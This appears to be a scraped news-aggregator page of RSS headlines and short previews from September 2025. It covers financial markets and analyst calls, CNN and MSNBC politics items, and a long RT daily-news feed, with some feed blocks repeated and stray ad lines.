U.S. August budget deficit falls 9% as Trump tariffs boost customs receipts

Article link

Date of publish: 2025-09-11 18:03:42

Warner Bros. Discovery soars on rumored Paramount Skydance bid

Article link

Date of publish: 2025-09-11 17:55:48

Exclusive: Alpha Modus sues MNTN Inc. over alleged patent infringement

Article link

Date of publish: 2025-09-11 17:09:19

Wells Fargo sees Warner Bros Discovery S&S as potential Netflix takeover target

Article link

Date of publish: 2025-09-11 16:56:06

Biotech’s nuclear winter not over yet—Wolfe

Article link

Date of publish: 2025-09-11 16:52:43

SoundHound has tech edge but also high valuation risk

Article link

Date of publish: 2025-09-11 16:29:19

FTSE 100 today: Stocks climb, pound rises; ECB holds rates

Article link

Date of publish: 2025-09-11 16:09:59

European stocks rise after ECB rate decision, U.S. CPI release

Article link

Date of publish: 2025-09-11 15:55:05

Goldman starts Celsius at Buy on market share gains and international push

Article link

Date of publish: 2025-09-11 15:54:22

Exclusive: Shareholder revolt threatens Alcon’s takeover of STAAR Surgical

Article link

Date of publish: 2025-09-11 15:49:59

Wolfe takes a closer look at Tesla’s energy business

Article link

Date of publish: 2025-09-11 15:44:53

Tapestry targets low-teens returns by 2028, leans on Coach brand for growth

Article link

Date of publish: 2025-09-11 15:15:51

Goldman refreshes its gold stocks outlook for 2025

Article link

Date of publish: 2025-09-11 15:00:23

Circle Internet Group stock soars amid stablecoin growth momentum

Article link

Date of publish: 2025-09-11 14:58:33

Chewy upgraded by Seaport and Deutsche Bank on growth and share gains

Article link

Date of publish: 2025-09-11 14:32:49

Aon’s investments in talent, strong margins set it apart from peers

Article link

Date of publish: 2025-09-11 14:30:52

Aon investments in talent, strong margins set it apart from peers

Article link

Date of publish: 2025-09-11 14:30:01

Jacobs says QXO can thrive even as giants Home Depot and Lowe’s loom over deals

Article link

Date of publish: 2025-09-11 14:28:46

Bitcoin price today: steady at $114k after hotter-than-expected August CPI

Article link

Date of publish: 2025-09-11 14:10:19

Opendoor taps Shopify’s Nejatian as CEO; Shares jump 49%

Article link

Date of publish: 2025-09-11 13:59:07

AbbVie stock rises after securing patent protection for RINVOQ until 2037

Article link

Date of publish: 2025-09-11 13:57:06

Thermo Fisher’s cheaper valuation, growth visibility draw bullish view

Article link

Date of publish: 2025-09-11 13:54:04

Record $1.5T buybacks may swell by another $600B: JPMorgan

Article link

Date of publish: 2025-09-11 13:42:49

Barclays ups price targets for Seagate, Western Digital on improved HDD outlook

Article link

Date of publish: 2025-09-11 13:25:00

Guggenheim bullish on Atlassian and GitLab as AI adoption to fuel growth

Article link

Date of publish: 2025-09-11 13:14:24

Barclays raises smartphone unit growth, sees a modest performance for iPhones

Article link

Date of publish: 2025-09-11 13:08:33

Equity valuations to remain elevated, Deutsche Bank says

Article link

Date of publish: 2025-09-11 13:02:41

U.S. consumer prices rise by 2.9% in August

Article link

Date of publish: 2025-09-11 12:56:29

Wolfe upgrades Bill following share’s steep decline

Article link

Date of publish: 2025-09-11 12:44:41

Merck scraps £1 billion London research hub, citing U.K. investment issues

Article link

Date of publish: 2025-09-11 12:42:06

MicroStrategy’s denial of S&P500 inclusion is a blow to crypto treasuries: JPM

Article link

Date of publish: 2025-09-11 12:35:42

Micron stock rises as Citi boosts price target ahead of earnings

Article link

Date of publish: 2025-09-11 12:19:00

ECB keeps interest rates unchanged; uncertainty remains

Article link

Date of publish: 2025-09-11 12:16:47

Kroger shares rise as Q2 earnings beat estimates, guidance raised

Article link

Date of publish: 2025-09-11 12:15:52

U.S. mid-cap bank outlook for 2026 "optimistic," Barclays says

Article link

Date of publish: 2025-09-11 12:01:51

BofA lists 13 SMID cap stocks that could rebound

Article link

Date of publish: 2025-09-11 12:01:37

Will price growth in the UK stay flat in August?

Article link

Date of publish: 2025-09-11 11:56:07

Adobe, Oracle and Amazon rise premarket; FedEx and UPS fall

Article link

Date of publish: 2025-09-11 11:50:27

AI enthusiasm will likely take S&P 500 above 7000 in 2026: strategist

Article link

Date of publish: 2025-09-11 11:46:41

How does Magnum demerger impact Unilever?

Article link

Date of publish: 2025-09-11 11:27:04

BofA cuts UPS, FedEx ratings, citing de minimis volume and cost pressures

Article link

Date of publish: 2025-09-11 11:11:32

Oracle’s cloud growth forecast ’rarely seen at this scale’: Bernstein

Article link

Date of publish: 2025-09-11 11:00:36

Nordex slips amid report of possible slowdown in German renewable energy roll-out

Article link

Date of publish: 2025-09-11 10:52:31

European cement gains momentum, J.P. Morgan says stay ‘heavy’

Article link

Date of publish: 2025-09-11 10:50:48

Gold prices slip from record highs; U.S. CPI looms

Article link

Date of publish: 2025-09-11 10:50:20

Apple downgraded by DA Davidson, says ’defense is not enough’

Article link

Date of publish: 2025-09-11 10:43:44

Morgan Stanley adds Amazon as Top Pick

Article link

Date of publish: 2025-09-11 10:43:29

Nvidia lifted to Buy at D.A. Davidson amid ‘overwhelming growth’ in compute demand

Article link

Date of publish: 2025-09-11 10:34:23

AI NAND chip market seen growing to $29 bn by 2029, Morgan Stanley says

Article link

Date of publish: 2025-09-11 10:26:46

Gold should be 10-15% of portfolio, says Ray Dalio

Article link

Date of publish: 2025-09-11 10:16:27

Global stocks to continue rallying by mid-2026: Citi

Article link

Date of publish: 2025-09-11 10:11:44

Markets may price 50bp Fed cut if CPI softens today, JPMorgan’s Stealey says

Article link

Date of publish: 2025-09-11 10:09:28

Oil prices slip lower on U.S. demand concerns; geopolitical tensions offer support

Article link

Date of publish: 2025-09-11 09:59:34

Esprinet stock surges 14% after Q2 revenue beats forecasts on tech demand

Article link

Date of publish: 2025-09-11 09:54:35

Gucci owner Kering gains 2% as Valentino deal pushes back to 2028

Article link

Date of publish: 2025-09-11 09:42:55

Morgan Stanley sees $13T+ long-term value from AI adoption in S&P 500

Article link

Date of publish: 2025-09-11 09:35:45

IEA lifts annual crude output forecast amid OPEC+ production hike

Article link

Date of publish: 2025-09-11 09:32:42

ISS gains on Jefferies “buy” call, boosted by growth outlook and buyback plans

Article link

Date of publish: 2025-09-11 09:26:19

R&S Group H1 earnings slightly below consensus, guidance intact; shares slip

Article link

Date of publish: 2025-09-11 09:07:32

Buzzi up 7% on J.P. Morgan upgrade, European cement outlook improves

Article link

Date of publish: 2025-09-11 09:07:18

Politics RSS

Political sites below.

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

MSNBC Top Stories

Charlie Kirk’s death leaves lawmakers on edge across party lines

Members of Congress are on high alert, calling for increased security, after the assassination of conservative activist Charlie Kirk in Utah

Article link

Date of publish: Sat, 13 Sep 2025 01:07:31 GMT

Erika Kirk remembers her husband Charlie Kirk in first public address since his killing

Erika Kirk, the widow of the late Charlie Kirk, delivered her first remarks since his killing at Utah Valley University. Jacob Soboroff reports on the growing political violence in the United States.

Article link

Date of publish: Sat, 13 Sep 2025 00:58:24 GMT

Kash Patel’s difficulties and embarrassments at the FBI do not go unnoticed

FBI Director Kash Patel was already facing questions about whether he was up for the job. Those questions grew louder this week after the Charlie Kirk shooting.

Article link

Date of publish: Fri, 12 Sep 2025 15:21:26 GMT

RT - Daily news

South Africa finalizing appointment of new ambassador to US

Preview President Cyril Ramaphosa has said Pretoria is seeking a suitable diplomat for the post, mindful of the changed geopolitical situation
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 06:59:16 +0000

Can India and China finally bridge their deep divides?

Preview The SCO summit made the West pay attention – because it showed that nations can try to work around their differences for a better world
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 04:54:41 +0000

Tsunami alert follows 7.4 magnitude Kamchatka aftershock (VIDEOS)

Preview A strong aftershock has struck Russia’s Kamchatka Peninsula, prompting authorities to place all emergency services on high alert
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 03:28:56 +0000

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

The Axe Files with David Axelrod

Go beyond the soundbites and get to know some of the most interesting players in politics.

Article link

Margins of Error

Look closely at almost anything and you'll find data—lots of it. But what are those numbers really saying about who we are and what we believe? Harry Enten is on a mission to find out.

Article link

The notable legal clouds that continue to hang over Donald Trump

All eyes are on former President Donald Trump, who has launched another White House bid.

Article link

Date of publish: Thu, 08 Dec 2022 03:36:24 GMT

The fine print of the Respect for Marriage Act

Let's start with the positive: Republicans and Democrats are coming together to protect same-sex marriage from the Supreme Court.

Article link

Date of publish: Tue, 29 Nov 2022 23:32:13 GMT

Everything you need to know about Biden's student loan forgiveness program

President Joe Biden's federal student loan forgiveness program, which promises to deliver up to $20,000 of debt relief for millions of borrowers, is on hold indefinitely as legal challenges work their way through the courts.

Article link

Date of publish: Tue, 13 Jun 2023 20:58:58 GMT

Politics of the Day

Politics of the Day

Article link

Date of publish: Fri, 14 Jun 2024 04:13:26 GMT

0% intro APR until 2024 is 100% insane
It's official: now avoid credit card interest into 2024
Experts: this is the best cash back card of 2022
Turn Your Rising Home Equity Into Cash You Can Use
Dream Big with a Home Equity Loan
Want Cash Out of Your Home? Here Are Your Best Options
Use the Right Card for Holiday Gifts (Save Hundreds on Interest)
10 Cards Charging 0% Interest Until 2024
Get a $200 Cash Back Bonus on Holiday Gift Buying
Array

Vice President Kamala Harris, a former US senator from California who previously served as the state's attorney general, could be the first Black woman and Asian American to lead a major party ticket after receiving President Joe Biden's support to become the next Democratic presidential nominee.

Article link

Array

Fareed explains why AI's massive energy demands are straining the power grid, but also why AI could enable big breakthroughs in sustainability and clean energy.

Article link

Array

In the wake of the Republican National Convention earlier this month, Fareed speaks with historian Niall Ferguson about how and why the modern-day GOP has changed since the Reagan era of the 1980s.

Article link

Array

Fareed speaks with New York Times opinion columnist Ezra Klein about the significance of Vice President Kamala Harris' early career as a prosecutor — and how it may affect her campaign.

Article link

Array

New York Times opinion columnist Ezra Klein speaks with Fareed about the effects of President Joe Biden's decision to not seek reelection — and whether Vice President Kamala Harris can reshape the race.

Article link

Array

CNN Senior Political Commentator Scott Jennings and Political Commentators Kristen Soltis Anderson, Jamal Simmons and Kate Bedingfield tell CNN's Jake Tapper who they think should join Vice President Kamala Harris' ticket and with 100 days until election day, the state of the 2024 presidential race.

Article link

Array

On CNN's State of the Union, Republican Sen. Tom Cotton criticizes Harris' comments on the war in Gaza and calls her a "San Francisco liberal who cannot keep this country safe."

Article link

Array

Years before he became president, many Americans first met Barack Obama during the 2004 Democratic National Convention.

Article link

Array

Joe Biden, the 46th president of the United States, announced on Sunday, July 21, that he is not seeking reelection.

Article link

Array

Fareed is joined by Jane Gilbert, chief heat officer for Miami-Dade County, Fla., who discusses how she is working to combat the effects of record high temperatures in a county that is considered ground zero for the climate crisis in the United States.

Article link

Array

Fareed speaks with David Frum, staff writer at The Atlantic, about how Sen. JD Vance went from being a fierce critic of Donald Trump to becoming the former president's running mate.

Article link

Array

Colorado Gov. Jared Polis tells CNN's Jake Tapper that Biden needs to show Democrats that he can turn his campaign around and says "he hasn't done that yet."

Article link

MSNBC Top Stories

Charlie Kirk’s death leaves lawmakers on edge across party lines

Members of Congress are on high alert, calling for increased security, after the assassination of conservative activist Charlie Kirk in Utah

Article link

Date of publish: Sat, 13 Sep 2025 01:07:31 GMT

Erika Kirk remembers her husband Charlie Kirk in first public address since his killing

Erika Kirk, the widow of the late Charlie Kirk, delivered her first remarks since his killing at Utah Valley University. Jacob Soboroff reports on the growing political violence in the United States.

Article link

Date of publish: Sat, 13 Sep 2025 00:58:24 GMT

Kash Patel’s difficulties and embarrassments at the FBI do not go unnoticed

FBI Director Kash Patel was already facing questions about whether he was up for the job. Those questions grew louder this week after the Charlie Kirk shooting.

Article link

Date of publish: Fri, 12 Sep 2025 15:21:26 GMT

What was most notable about Trump’s response to Charlie Kirk's killing

After influential MAGA activist Charlie Kirk was shot, the president pledged to use the government to go after his political opponents.

Article link

Date of publish: Fri, 12 Sep 2025 10:00:41 GMT

Denver police say school shooter showed signs of extremist radicalization

The gunman behind this week’s school shooting in Colorado was “radicalized by an extremist network,” authorities in Jefferson County said Thursday

Article link

Date of publish: Fri, 12 Sep 2025 20:11:38 GMT

Legal analyst on new Epstein-Maxwell emails: ‘Expect more of these things to come out’

Lisa Rubin says a new Bloomberg News report raises fresh questions about Epstein co-conspirator Ghislaine Maxwell, after her conversations with the Trump DOJ.

Article link

Date of publish: Fri, 12 Sep 2025 19:39:14 GMT

Trump’s Hyundai ICE raid likely lost the U.S. a significant amount of South Korean business

ICE officials arrested hundreds of South Koreans at a Hyundai-LG battery factory in Georgia, putting at risk the country's plan to invest $350 billion in U.S. manufacturing.

Article link

Date of publish: Fri, 12 Sep 2025 18:45:04 GMT

A high Black unemployment rate is almost always a bellwether

Warning signs in the labor market are raising concerns about the U.S. economy’s health.

Article link

Date of publish: Fri, 12 Sep 2025 19:45:57 GMT

Arrest papers show how Utah intends to pursue the death penalty in Charlie Kirk’s killing

The arrest papers in Tyler Robinson’s case show how Utah state authorities intend to pursue capital punishment for the death of Charlie Kirk.

Article link

Date of publish: Fri, 12 Sep 2025 17:59:04 GMT

Justin Baldoni pushes to depose Taylor Swift in legal feud with Blake Lively

Taylor Swift may be compelled to provide evidence in the long-brewing legal battle between Justin Baldoni and Blake Lively

Article link

Date of publish: Fri, 12 Sep 2025 22:45:14 GMT

Trump administration announces plan to help boost white immigration to the U.S.

The Trump administration has unveiled a plan to boost white immigration to the United States, in stark contrast with its efforts to expel immigrants from largely nonwhite countries as varied as Nepal and Nicaragua

Article link

Date of publish: Thu, 11 Sep 2025 18:51:32 GMT

The misogyny at the heart of the WNBA 'prank' that caught the eye of Donald Trump Jr.

Today NY Liberty take on the Linx as the WNBA heads into the final stretch of the 2025 season. Green dildo sex toys thrown by crypto bros shouldn't ruin it.

Article link

Date of publish: Sat, 16 Aug 2025 10:01:40 GMT

Trump’s call for death penalty in Charlie Kirk shooting shows a difference in his second term

In Donald Trump’s first presidential term, Sayfullo Saipov tried to stop the federal government from seeking the death penalty against him after Trump publicly pressed for his execution.

Article link

Date of publish: Fri, 12 Sep 2025 19:42:55 GMT

Trump announces plan to deploy forces to Memphis, claims it’s ‘deeply troubled’

Donald Trump would've "preferred" sending federal forces to Chicago, but after facing resistance, he's settled on Memphis, instead.

Article link

Date of publish: Fri, 12 Sep 2025 13:00:40 GMT

The Trump administration’s destruction of contraceptives was both wasteful and cruel

U.S. officials had already spent nearly $10 million on contraceptives to be sent to low-income nations. Then the Trump administration destroyed them.

Article link

Date of publish: Fri, 12 Sep 2025 15:26:12 GMT

Trump and his MAGA allies are pushing an outlandish theory to explain his Epstein letter

Jen Psaki shares the outlandish theory being shared by Trump and his MAGA allies to explain his signature in Jeffrey Epstein's "creepy" birthday book.

Article link

Date of publish: Thu, 11 Sep 2025 19:36:24 GMT

Trump and Vance praise Christian extremist who wants to destroy the secular state

President Donald Trump and his vice president, JD Vance, issued videotaped remarks to attendees at a conference hosted by an avowed Christian nationalist this week.

Article link

Date of publish: Thu, 11 Sep 2025 20:23:12 GMT

As Democrats press White House on deadly boat strike, Republicans sit on their hands

A week after the Trump administration killed suspected drug dealers in international waters, Democrats have some pointed questions. GOP senators do not.

Article link

Date of publish: Thu, 11 Sep 2025 16:49:41 GMT

Judge blocks Trump’s attempt to fire Lisa Cook from the Fed, but the president is appealing

A federal district judge’s ruling late Tuesday keeps Lisa Cook on the Federal Reserve board of governors for now.

Article link

Date of publish: Wed, 10 Sep 2025 13:19:49 GMT

California lawmakers approve first-of-its-kind state ban on masked law enforcement

California’s Legislature on Thursday passed a bill that bans federal and state law enforcement officials from wearing masks, with some exceptions.

Article link

Date of publish: Fri, 12 Sep 2025 20:32:25 GMT

Trump keeps dismissing the Epstein files. Here’s what I’m doing about it.

The discharge petition that Rep. Ro Khanna is leading with Rep. Thomas Massie will soon have the 218 signatures required to force a vote to release the files.

Article link

Date of publish: Fri, 12 Sep 2025 10:00:41 GMT

New trove of reported Epstein emails raises new questions about Trump ties

Two decades’ worth of emails that reportedly belonged to Jeffrey Epstein shine light on the late sex offender’s relationship with accomplice Ghislaine Maxwell — and raise new questions about his relationships with Donald Trump and other well-connected political figures.

Article link

Date of publish: Thu, 11 Sep 2025 23:06:11 GMT

Kamala Harris is done sacrificing herself in the name of party unity

Kamala Harris is finally ready to reclaim ownership of her own political and personal narrative in her new memoir, "107 Days."

Article link

Date of publish: Thu, 11 Sep 2025 19:44:43 GMT

Why the Trump administration wants the DOJ to collect your voter data

The New York Times reports that the Justice Department is putting together a voter roll that could be misused to spread false claims about immigrants voting.

Article link

Date of publish: Thu, 11 Sep 2025 21:26:22 GMT

Rev. Al Sharpton: Republicans and Democrats must unite to stop political violence

Rev. Al Sharpton calls on Republicans and Democrats to unite to stop political violence after the shooting death of Trump ally, Charlie Kirk, in Utah.

Article link

Date of publish: Fri, 12 Sep 2025 17:10:02 GMT

RT - Daily news

South Africa finalizing appointment of new ambassador to US

Preview President Cyril Ramaphosa has said Pretoria is seeking a suitable diplomat for the post, mindful of the changed geopolitical situation
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 06:59:16 +0000

Can India and China finally bridge their deep divides?

Preview The SCO summit made the West pay attention – because it showed that nations can try to work around their differences for a better world
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 04:54:41 +0000

Tsunami alert follows 7.4 magnitude Kamchatka aftershock (VIDEOS)

Preview A strong aftershock has struck Russia’s Kamchatka Peninsula, prompting authorities to place all emergency services on high alert
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 03:28:56 +0000

Poland dismisses media claims of troop deployment to Ukraine

Preview Poland’s Defense Ministry has clarified that all joint military activities with Kiev on drone warfare will be conducted inside Poland
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 02:35:09 +0000

Russia cautions Poland against drone ‘hysteria’

Preview Russia’s envoy to the UN, Vassily Nebenzia, has dismissed accusations that Moscow intentionally violated Polish airspace earlier this week
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 01:40:24 +0000

Poland pushes to strip jobless Ukrainians of benefits

Preview Lawmakers in Poland’s lower house of parliament have adopted a new bill tightening the rules for Ukrainian refugees
Read Full Article at RT.com

Article link

Date of publish: Sat, 13 Sep 2025 00:07:18 +0000

Telegram founder calls Charlie Kirk’s murder ‘assault on free speech’

Preview Freedom of expression is under attack worldwide and other liberties could soon be at risk, Telegram founder Pavel Durov has warned
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 23:12:13 +0000

Oxford debating club president-elect celebrated Charlie Kirk’s murder

Preview George Abaraonye, who had debated with Charlie Kirk earlier this year, mocked the murder of his conservative opponent
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 22:33:10 +0000

This Western country depends on China, but is obsessed with demonizing it

Preview Australia is getting engulfed by the “yellow peril” narrative, disregarding its own political and economic interests
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 21:46:08 +0000

The future belongs to love and friendship – Putin

Preview Humanity will master its new technological horizon while remaining rooted in family values, the Russian President has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 21:21:26 +0000

Kiev’s special forces strike Russian rescue ship

Preview The Ukrainian intelligence has claimed to have attacked a Russian ‘Black Sea Fleet’ vessel that has turned out to be a rescue ship
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 21:05:06 +0000

US to press G7 on seizing frozen Russian assets – Bloomberg

Preview The immobilized funds could be used to finance Ukraine, according to Washington’s proposal
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 21:04:44 +0000

Trump pledges investigation into Soros

Preview The billionaire investor paid “professional agitators” to organize “riots” in the US, the president has alleged
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 19:43:23 +0000

EU сourt challenges key Russian nuclear project in member state

Preview Hungary considers the Rosatom-led Paks-2 power plant to be critical to its energy security
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 19:09:49 +0000

Do you know where are they now? The lives and deaths of America’s assassins

Preview RT revisits the fates of those behind the US most high-profile murders, from the Lincoln assassination conspirators to John Lennon’s killer
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 19:05:50 +0000

US halts dialogue with Kosovo

Preview The American embassy in Pristina has said the breakaway region’s leadership has been fueling “tensions and instability”
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 18:20:09 +0000

US working to replace Russian gas sales to Europe – energy secretary

Preview Washington aims to fill the niche with American energy exports, Chris Wright has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 17:35:57 +0000

Intervision song contest draw takes place in Moscow

Preview Russia will perform under number 9, with 23 countries participating in total
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 16:35:54 +0000

Kirk murder suspect apprehended – Tyler Robinson’s mugshot published (PHOTO)

Preview The alleged assassin of the conservative activist was turned in to authorities by a family friend, according to Utah’s governor
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 16:23:04 +0000

Ukraine threatening nuclear plants – Russian envoy

Preview Kiev’s ability to strike with impunity encourages further attacks, according to a top diplomat
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 16:06:42 +0000

There is a country where the British army has retained impunity for years. Soldiers use it to escape their crimes

Preview The investigation into British army abuses in Kenya is progressing very slowly due to the reluctance of authorities from both countries
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 14:32:01 +0000

EU could target ‘Russian SWIFT’ – Euractiv

Preview France and Germany are reportedly pressing for deeper sanctions on foreign banks that maintain trade with Moscow  
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 14:07:59 +0000

Sahel state eases entry rules in ‘pan-Africanist’ move

Preview Burkina Faso’s government has said its visa fee waiver measure is in line with the country’s “pan-Africanist” stance
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:59:40 +0000

Indian-origin motel manager beheaded in Dallas

Preview A disagreement with an employee resulted in the brutal murder at a roadside inn in Texas
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:56:31 +0000

Suspected Charlie Kirk assassin in custody – Trump

Preview
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:18:47 +0000

Russia and China planning clearinghouse to avoid West – Moscow

Preview The project is aimed at building a payment infrastructure independent of the West, Finance Minister Anton Siluanov has said  
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:14:21 +0000

EU chief facing new ouster attempt after ‘pro-war’ address

Preview Two motions to censure Ursula von der Leyen have been filed following her speech to MEPs
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:03:44 +0000

Zelensky’s law forces Zarutska’s father to miss her funeral – media

Preview The 23-year old woman was brutally stabbed on a train by a man with over a dozen prior convictions in Charlotte, North Carolina last month
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 12:02:09 +0000

Peace talks with Kiev on hold – Kremlin

Preview Russia remains committed to a diplomatic resolution to the Ukraine conflict, spokesman Dmitry Peskov has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 11:28:34 +0000

South African men to be liberated from colonial naming values

Preview A South African court has found that denying men the right to take their wife’s surname violated constitutional equality provisions
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 10:55:06 +0000

US isn’t seeking confrontation with China – Pentagon

Preview Defense Secretary Pete Hegseth told Beijing that Washington does not want conflict but will defend its Asia-Pacific interests
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 10:50:07 +0000

Australian envoy supports Indian migrants in face of racist rallies

Preview Australia will “effectively” deal with the racism-related incidents that take place in the country, Philip Green has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 10:46:11 +0000

Ukraine has world’s worst demographics – EU Observer

Preview Mortality is about three times higher than births in Ukraine, data shows
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 09:47:45 +0000

Vice president of Africa’s newest country charged with murder

Preview South Sudan’s justice minister has claimed that evidence shows an armed group fighting state soldiers operated under Riek Machar’s command
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 09:10:17 +0000

Russian MPs to consider special bill for Ukraine conflict veterans

Preview Former servicemen will be offered free additional education to transition to civilian lives
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 08:29:51 +0000

Ukrainian strikes target Russian civilians – officials

Preview One person was killed and several others injured in two separate attacks
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 07:01:28 +0000

US will ‘sort out’ trade deal with India after it stops buying Russian oil – commerce secretary

Preview Howard Lutnick has called on New Delhi to open its markets and refrain from importing crude from Russia
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 06:34:51 +0000

Utah governor promises death penalty for Charlie Kirk’s killer

Preview Charlie Kirk’s unidentified assassin is still at large with a $100,000 bounty on his head amid a massive federal manhunt
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 04:12:48 +0000

FBI releases new VIDEO of Charlie Kirk’s assassin

Preview The FBI has released new video footage of the suspect in the assassination of conservative activist Charlie Kirk
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 03:02:36 +0000

Lukashenko accuses EU of blocking Ukraine peace deal

Preview The Belarusian leader has thanked US President Trump for trying to resolve the Ukraine conflict and accused the EU of obstructing efforts
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 02:39:19 +0000

US Democratic Party is ‘America’s Ukraine’ – Dugin on Charlie Kirk’s murder

Preview The assassination has united the MAGA movement while liberals can’t contain their joy, Russian philosopher Aleksandr Dugin has argued
Read Full Article at RT.com

Article link

Date of publish: Fri, 12 Sep 2025 01:20:21 +0000

Trump downplays claims of ‘Russian drone incursion‘ into Poland

Preview US President Donald Trump has downplayed Poland’s accusation that Russian drones intentionally violated its airspace this week
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 23:49:41 +0000

Belarus releases 52 prisoners during Trump envoy’s visit

Preview The humanitarian move was part of a wider deal with Washington that lifted sanctions on Belarus’ state airline
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 22:03:44 +0000

Russian messenger secure alternative to Western apps – FSB

Preview The MAX platform has become a key tool in tackling online fraud and bolstering digital sovereignty, the agency has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 21:17:14 +0000

Britain fires ambassador to US over Epstein links

Preview The UK envoy to the US, Peter Mandelson, has been dismissed after the emergence of his emails to Jeffrey Epstein
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 21:12:38 +0000

Ammo found with Charlie Kirk murder weapon bears ‘transgender, anti-fascist’ messages – media

Preview ABC has cited unnamed law enforcement officials as making the claim after the FBI announced that agents recovered a bolt-action rifle
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 20:35:06 +0000

The Middle East is being given a golden chance to prosper – can it unite and seize it?

Preview Aligning with the SCO is an opportunity for the region’s nations to be an autonomous force shaping the future, but differences persist
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 20:23:06 +0000

Ex-Brazilian president sentenced to 27 years over coup attempt

Preview The former leader faces a decades-long jail sentence for conspiring to overturn the results after losing his 2022 re-election bid
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 19:56:10 +0000

Protesters spoke, NGOs pulled strings: The untold story of Nepal’s upheaval

Preview Angry youth in the Himalayan nation bordering India and China have forced a political shake-up hoping to end corruption and impoverishment
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 18:41:35 +0000

Freedom of speech in US at stake – commentators on Charlie Kirk assassination

Preview Approving violence against political opponents has become dangerously commonplace, experts have told RT
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 18:09:30 +0000

WATCH Russian drone operators spot and spare civilians amid battle

Preview New footage circulating online shows Russian FPV operators carefully identifying their targets
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 16:51:35 +0000

US lifts sanctions on Belarus’ national airline

Preview Belavia had been blacklisted by the Biden administration in 2023 over alleged election fraud and the Ukraine conflict
Read Full Article at RT.com
